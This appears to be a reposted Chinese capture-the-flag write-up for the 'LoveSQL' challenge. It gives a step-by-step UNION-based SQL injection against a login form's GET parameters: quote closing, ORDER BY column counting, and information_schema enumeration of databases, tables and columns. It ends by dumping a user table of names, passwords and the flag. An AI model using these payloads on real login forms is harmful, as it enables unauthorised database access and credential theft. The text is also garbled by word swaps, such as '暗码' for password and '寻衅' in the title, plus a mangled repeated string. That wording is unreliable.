[极客大寻衅 2019]LoveSQL 1
代码审计,发现表单方式为get提交到check.php
万能暗码
登录成功,这边我以为暗码就是flag,结果并不是,联合题目信息,料想这应该是根据账号暗码的注入
尝试闭合?username=admin' and 1=1%23&password=d3c9cf30a12d1f13d4f778859fb16f73正常表现,?username=admin' and 1=2%23&password=d3c9cf30a12d1f13d4f778859fb16f73表现账号暗码错误
存在闭合注入,order by探测字段,order by 4,表现列错误,判定出字段数为3
- ?username=admin' order by 4%23&password=d3c9cf30a12d1f13d4f778859fb16f73
这边有个小坑,之前一直用admin来做账号,结果发现闭合之后随便都是登录进去的,导致union表现不出来注入点,所以随便改了个username,然后进行union连合点查找
- ?username=abc' union select 1,2,3%23&password=111
根据表现判定2和3都是注入点(怀疑sql是这么写的:username= u s e r n a m e a n d p a s s w o r d = {username} and password= usernameandpassword={password},心可真大)
爆库(回显3为例)
- ?username=abc' UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata%23&password=111
发现数据库geek,爆表
- ?username=abc' UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema="geek"%23&password=111
发现两个表,爆字段
- ?username=abc' UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name="l0ve1ysq1"%23&password=111
爆值
- ?username=abc' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=111
太长了我复制下来
- Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{0430bf83-c7cb-403f-8965-54dae295b134}'
flag{0430bf83-c7cb-403f-8965-54dae295b134}
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
